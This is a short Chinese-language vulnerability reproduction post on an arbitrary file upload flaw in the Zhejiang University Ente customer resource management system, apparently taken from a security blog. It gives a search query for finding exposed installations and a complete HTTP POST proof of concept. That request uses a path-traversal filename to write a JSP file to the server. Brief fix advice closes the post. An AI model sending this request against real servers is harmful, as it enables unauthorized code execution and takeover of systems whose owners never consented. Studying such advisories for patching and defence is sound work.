浙大恩特客户资源管理系统 CrmBasicAction.entcrm任意文件上传

产品介绍

浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。

漏洞描述

浙大恩特客户资源管理系统 fcrmbasicaction接口存在任意文件上传漏洞。攻击者可通过该漏洞在服务器端上传后门,执行代码,获取服务器权限,进而控制整个 web 服务器。

资产测绘

title=“欢迎使用浙大恩特客户资源管理系统”
浙大恩特客户资源管理系统 CrmBasicAction.entcrm任意文件上传_第1张图片

漏洞复现

POC如下:

POST /entsoft/CrmBasicAction.entcrm?method=zipFileUpload&c_transModel=old HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36
Content-Length: 267
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: multipart/form-data; boundary=obklzkazkwnc3wsfvxrt

--obklzkazkwnc3wsfvxrt
Content-Disposition: form-data; name="file"; filename="../../=from.jsp"
Content-Type: application/zip

<% out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
--obklzkazkwnc3wsfvxrt--

浙大恩特客户资源管理系统 CrmBasicAction.entcrm任意文件上传_第2张图片

访问上传文件:
浙大恩特客户资源管理系统 CrmBasicAction.entcrm任意文件上传_第3张图片

修复建议

1、升级到安全版本
2、如非必要,禁止公网访问该系统。
3、设置白名单访问。

你可能感兴趣的:(漏洞复现,网络,php,安全,web安全)